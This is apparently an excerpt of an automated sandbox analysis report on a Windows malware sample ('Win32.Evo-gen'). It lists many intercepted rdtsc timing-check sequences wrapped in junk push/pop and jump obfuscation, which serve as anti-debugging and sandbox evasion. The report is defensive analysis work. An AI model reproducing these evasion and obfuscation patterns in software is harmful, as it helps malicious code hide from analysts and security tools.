                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0150 second address: 55E0154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0154 second address: 55E01D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F449CC63D7Ah 0x00000010 sub al, 00000078h 0x00000013 jmp 00007F449CC63D7Bh 0x00000018 popfd 0x00000019 push ecx 0x0000001a jmp 00007F449CC63D7Fh 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 jmp 00007F449CC63D7Fh 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F449CC63D7Bh 0x00000032 sub ah, FFFFFF9Eh 0x00000035 jmp 00007F449CC63D89h 0x0000003a popfd 0x0000003b popad 0x0000003c push dword ptr [ebp+04h] 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E01D2 second address: 55E01D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E01D6 second address: 55E01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E01DC second address: 55E01FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E01FA second address: 55E0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F449CC63D83h 0x0000000a add ecx, 489B4E0Eh 0x00000010 jmp 00007F449CC63D89h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0233 second address: 55E0251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0251 second address: 55E0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0255 second address: 55E025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0290 second address: 55E0296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0296 second address: 55E029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E029A second address: 55E02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F449CC63D80h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E02C0 second address: 55E02C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E02C4 second address: 55E02CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E02CA second address: 55E02D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600AF5 second address: 5600AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600AF9 second address: 5600B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600B15 second address: 5600B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 287E72FBh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600B2A second address: 5600B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56006CE second address: 56006D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56006D2 second address: 56006D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600660 second address: 5600689 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 call 00007F449CC63D87h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ebx, 2B53A8C6h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600361 second address: 5600367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600367 second address: 560036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 560036B second address: 56003B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F449CEB0746h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F449CEB0740h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F449CEB0740h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56003B4 second address: 56003D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5610129 second address: 5610130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5610130 second address: 5610169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F449CC63D7Ah 0x00000009 sub cx, 7E18h 0x0000000e jmp 00007F449CC63D7Bh 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F449CC63D81h 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5610169 second address: 56101B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 pushfd 0x00000006 jmp 00007F449CEB0748h 0x0000000b jmp 00007F449CEB0745h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F449CEB073Dh 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56101B0 second address: 56101E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F449CC63D88h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56101E3 second address: 56101E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56101E9 second address: 56101EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56101EF second address: 56101F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640E92 second address: 5640E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640E98 second address: 5640E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640E9C second address: 5640EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F449CC63D82h 0x00000015 or cx, BC08h 0x0000001a jmp 00007F449CC63D7Bh 0x0000001f popfd 0x00000020 call 00007F449CC63D88h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640EEF second address: 5640F33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F449CEB073Eh 0x00000011 xor eax, 69D1B0C8h 0x00000017 jmp 00007F449CEB073Bh 0x0000001c popfd 0x0000001d mov ebx, ecx 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, 6109h 0x00000029 popad 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620548 second address: 5620558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D7Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620558 second address: 562055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 562055C second address: 56205A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F449CC63D7Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx esi, di 0x00000013 mov cx, di 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F449CC63D85h 0x0000001e mov eax, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F449CC63D7Dh 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56205A5 second address: 56205CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F449CEB073Dh 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56205CC second address: 562060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d jmp 00007F449CC63D7Eh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F449CC63D87h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 562060D second address: 5620613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620613 second address: 5620617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600506 second address: 560050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 560050C second address: 5600538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F449CC63D80h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, esi 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600538 second address: 560053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 560053E second address: 5600594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F449CC63D84h 0x00000013 xor eax, 145F0F38h 0x00000019 jmp 00007F449CC63D7Bh 0x0000001e popfd 0x0000001f push esi 0x00000020 mov ecx, edi 0x00000022 pop edx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov di, 44FEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600594 second address: 5600599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600599 second address: 56005AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D81h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56005AE second address: 56005CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620009 second address: 5620031 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CC63D7Eh 0x00000008 add cx, 9D58h 0x0000000d jmp 00007F449CC63D7Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620031 second address: 5620035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620035 second address: 5620039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620039 second address: 5620047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620047 second address: 5620064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620064 second address: 56200DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F449CEB0741h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F449CEB073Ch 0x00000017 add eax, 146BCC78h 0x0000001d jmp 00007F449CEB073Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F449CEB0748h 0x00000029 xor esi, 0006E6D8h 0x0000002f jmp 00007F449CEB073Bh 0x00000034 popfd 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 pushad 0x00000039 mov dh, ah 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640667 second address: 564066D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 564066D second address: 5640699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CEB0747h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640699 second address: 56406C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 26h 0x00000005 mov si, 3087h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F449CC63D88h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56406C0 second address: 5640714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F449CEB0746h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 jmp 00007F449CEB073Eh 0x00000017 push ecx 0x00000018 mov cl, dl 0x0000001a pop esi 0x0000001b popad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F449CEB0745h 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640714 second address: 564073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F449CC63D7Dh 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 564073B second address: 5640741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640741 second address: 5640745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5640745 second address: 56407C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d jmp 00007F449CEB073Fh 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 call 00007F449CEB0744h 0x0000001a mov dx, si 0x0000001d pop esi 0x0000001e pushfd 0x0000001f jmp 00007F449CEB0747h 0x00000024 and ah, FFFFFF8Eh 0x00000027 jmp 00007F449CEB0749h 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F450E7A38EAh 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F449CEB073Dh 0x0000003b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56408B3 second address: 56408B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56408B9 second address: 56408BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F00B6 second address: 55F00BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F00BA second address: 55F00F4 instructions: 0x00000000 rdtsc 0x00000002 mov al, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F449CEB0744h 0x0000000b jmp 00007F449CEB0742h 0x00000010 pop ecx 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 mov ecx, 1794080Fh 0x0000001d popad 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F00F4 second address: 55F0108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D80h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0108 second address: 55F0166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F449CEB0744h 0x00000013 adc al, 00000018h 0x00000016 jmp 00007F449CEB073Bh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov ebx, esi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F449CEB0741h 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ecx 0x0000002c movsx ebx, ax 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 mov ebx, 7B454466h 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0166 second address: 55F01D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CC63D87h 0x00000008 add ecx, 5E8BEEEEh 0x0000000e jmp 00007F449CC63D89h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+10h] 0x0000001a jmp 00007F449CC63D7Eh 0x0000001f xchg eax, esi 0x00000020 jmp 00007F449CC63D80h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F449CC63D7Eh 0x0000002d rdtsc
